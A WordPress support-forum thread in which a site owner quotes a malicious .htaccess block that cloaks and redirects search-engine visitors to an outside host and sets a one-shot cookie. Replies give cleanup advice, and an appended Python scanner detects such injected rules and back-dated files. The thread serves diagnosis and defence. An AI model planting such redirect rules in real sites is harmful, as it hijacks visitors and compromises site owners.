WordPress.org Forums: .htaccess Attack! (7 posts)

  1. welshhuw
    Member
    Posted 4 years ago #

    Hi,

    I have been finding some .htaccess files containing the following within my WordPress installation. Also, we have another 20ish sites on the same server, and the files have appeared there too. (These sites are html/css sites run on our custom cms)

    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
    RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
    RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
    RewriteCond %{HTTPS} ^off$
    RewriteRule ^(.*)$ http://protechere.com/cgi-bin/r.cgi?p=10003&i=aab066bc&j=310&m=708aa72730768a8e4702c023017cccd9&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
    # exgocgkctswo

    I have been deleting the infected files but can someone help me shed some light on what it is and how it got there! My server guys are saying it's something to do with a WP plugin?

    Thanks

  2. Well ... what plugins are you running?

    It looks more like a server hack to me, but it could be a bad plugin, so start by disabling and deleting the ones you don't need AND changing your server and wordpress passwords. Just in case.

  3. welshhuw
    Member
    Posted 4 years ago #

    Hi,

    Thanks for your reply. Here is the list of plugins I have running. Over about 5 WP installations.

    Akismet
    All In One Seo Pack
    Google XML Sitemaps
    wp Smush.it
    Automatic SEO links
    cForms
    Featured Content Gallery
    Super Image Plugin
    Video Widget
    WP Security Scan
    FeedWordpress
    TDO Mini Forms

    I have deleted and disabled the ones I wasn't using and didn't need.

    I'd be grateful for any advice on where this could've come from!!

    Thanks again.

  4. None of those should be causing this behavior.

    Read this: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Your server may be under attack.

  5. welshhuw
    Member
    Posted 4 years ago #

    Thanks but the server guys are abs. positive it's due to plugins...!?

    Have deleted all infected files and checked all plugins are up to date.

  6. Yeah, a lot of the times server guys are 100% sure it's plugins. Generally it's not. I mean, yes, SOME plugins are made by hackers, but it's more common that a botched plugin install leaves your server insecure, which opens you to server hacks. And even more common than THAT is a server insecure on a level you, as a user, cannot fix, and your host must.

    Change your server password, your database password, and your blog passwords.

    Check the folder/file permissions on your account. Do the best you can.

  7. welshhuw
    Member
    Posted 4 years ago #

    Did all of the above and now it's back!!

    But what I can figure out is that the infected files have a later date than when I cleaned them all out???

    I know I would have deleted/cleaned them out so is it possible for them to 'back-date' the infected files?
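The rule block quoted in the first post redirects visitors arriving from search engines to an external site and drops a cookie so the same visitor is not redirected twice; the last post asks whether the reinfected files could have been back-dated. The following scanner is an added example written for this thread, not code from the original posts or from WordPress: it walks a web root, flags .htaccess files showing those three indicators, and compares each file's mtime (which `touch`/`utime` can set to any value) with its ctime (which the kernel updates on every inode change and which user space cannot set), so a back-dated file stands out. The sample .htaccess bodies, the `redirect.example` host and the `www.example.org` site name are constructed placeholders, and the ctime semantics assume a POSIX filesystem (on Windows `st_ctime` is creation time).

```python
import os
import re
import tempfile
import time
from urllib.parse import urlparse

# Constructed sample modelled on the injected block in the first post; the
# redirect host is a placeholder, not the one quoted in the thread.
INJECTED_HTACCESS = r"""RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|curl|wget).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteRule ^(.*)$ http://redirect.example/cgi-bin/r.cgi?h=%{HTTP_HOST}&u=%{REQUEST_URI} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
"""

# The stock WordPress permalink block, for comparison.
CLEAN_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

SEARCH_ENGINE_HINTS = ("google", "yahoo", "bing", "msn", "yandex", "search")
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
REDIRECT_FLAG_RE = re.compile(r"^(R|redirect)(=|$)", re.I)


def analyse_htaccess(text, own_hosts=()):
    """Return indicator strings for one .htaccess body (empty list if clean)."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []      # conds: RewriteConds seen since the last RewriteRule
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            conds.append((m.group(1).upper(), m.group(2)))
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), [f.strip() for f in (m.group(3) or "").split(",") if f.strip()]
        host = urlparse(target).hostname if target.lower().startswith(("http://", "https://")) else None
        # 1. external redirect: absolute URL to a host that is not ours, with an R flag
        if host and host.lower() not in own and any(REDIRECT_FLAG_RE.match(f) for f in flags):
            findings.append(f"off-site redirect to {host}")
        # 2. cloaking: the rule only fires for visitors referred by a search engine
        referers = [p.lower() for v, p in conds if v == "HTTP_REFERER"]
        if any(hint in p for p in referers for hint in SEARCH_ENGINE_HINTS):
            findings.append("redirect gated on search-engine referer (cloaking)")
        # 3. one-shot cookie: CO= flag sets a cookie that a negated HTTP_COOKIE cond checks
        cookie_conds = [p for v, p in conds if v == "HTTP_COOKIE" and p.startswith("!")]
        for f in flags:
            if f.upper().startswith("CO="):
                name = f[3:].split(":")[0]
                if any(name in p for p in cookie_conds):
                    findings.append(f"sets cookie {name!r} to suppress repeat redirects")
        conds = []
    return findings


def timestamp_report(path, slack=60):
    """mtime is user-settable; ctime is not. An mtime far older than ctime means
    the file was modified (or its metadata touched) after the date it claims."""
    st = os.stat(path)
    return {"mtime": st.st_mtime, "ctime": st.st_ctime,
            "backdated": st.st_ctime - st.st_mtime > slack}


def scan_tree(root, own_hosts=()):
    """Walk root and return a record for every .htaccess that shows indicators."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = analyse_htaccess(fh.read(), own_hosts)
        if findings:
            hits.append({"path": path, "findings": findings, **timestamp_report(path)})
    return hits


def demo():
    """Build a throwaway web root with one clean and one injected .htaccess,
    back-date the injected one by a month, and scan it."""
    root = tempfile.mkdtemp(prefix="htaccess-scan-")
    os.makedirs(os.path.join(root, "wp", "wp-content", "uploads"))
    clean = os.path.join(root, "wp", ".htaccess")
    bad = os.path.join(root, "wp", "wp-content", "uploads", ".htaccess")
    with open(clean, "w") as fh:
        fh.write(CLEAN_HTACCESS)
    with open(bad, "w") as fh:
        fh.write(INJECTED_HTACCESS)
    old = time.time() - 30 * 86400
    os.utime(bad, (old, old))       # what an attacker's "touch -d" would do
    return scan_tree(root, own_hosts=("www.example.org",))


if __name__ == "__main__":
    for hit in demo():
        print(hit["path"], "BACK-DATED" if hit["backdated"] else "", *hit["findings"], sep="\n  ")
```

Run it against a real document root as `scan_tree("/var/www", own_hosts=("your.site",))`; every hit is a file to quarantine, and a hit marked back-dated is evidence that the mtime you would otherwise use to date the intrusion cannot be trusted, so work from ctime and the web-server and FTP/SSH logs around that time instead.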

Topic Closed

This topic has been closed to new replies.
